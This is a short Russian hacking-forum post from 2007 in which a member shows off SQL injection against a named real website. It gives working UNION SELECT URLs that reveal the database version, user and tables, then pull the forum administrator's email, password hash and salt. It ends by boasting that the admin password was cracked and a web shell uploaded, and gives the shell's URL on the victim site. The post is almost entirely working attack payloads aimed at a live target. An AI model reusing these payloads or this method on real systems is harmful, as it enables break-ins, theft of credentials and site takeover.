08.11.2007, 01:30
|
|
Познающий
Регистрация: 26.07.2007
Сообщений: 50
С нами:
9892256
Репутация:
62
|
|
Сильно не пинайте... Первый вклад 
SQL-Inj...
Код:
http://asamsu.ru/asamsu.php?id=-1+union+select+0,1,concat(version(),char(58),user(),char(58),database()),3/*
Нарыл таблицы...
Код:
asa_news, asa_partners, asa_foto, asa_video, asa_dance, asa_materials, asa_pres, asa_price
Копаю дальше. Вот ошибка и база к форуму...
Код:
http://www.asamsu.ru/forum/index.php?showtopic=978&st=-1
А дальше, дело техники...
Код:
http://asamsu.ru/asamsu.php?id=-1+union+select+0,1,concat(converge_id,char(58),converge_email,char(58),converge_joined,char(58),converge_pass_hash,char(58),converge_pass_salt),3+from+asamsu_forum.forum_members_converge+where+converge_id=1/*
P.S.: Немного колдовства над паролем админа и шелл залит...
Код:
http://www.asamsu.ru/img/news/av-2919.php
|
|
|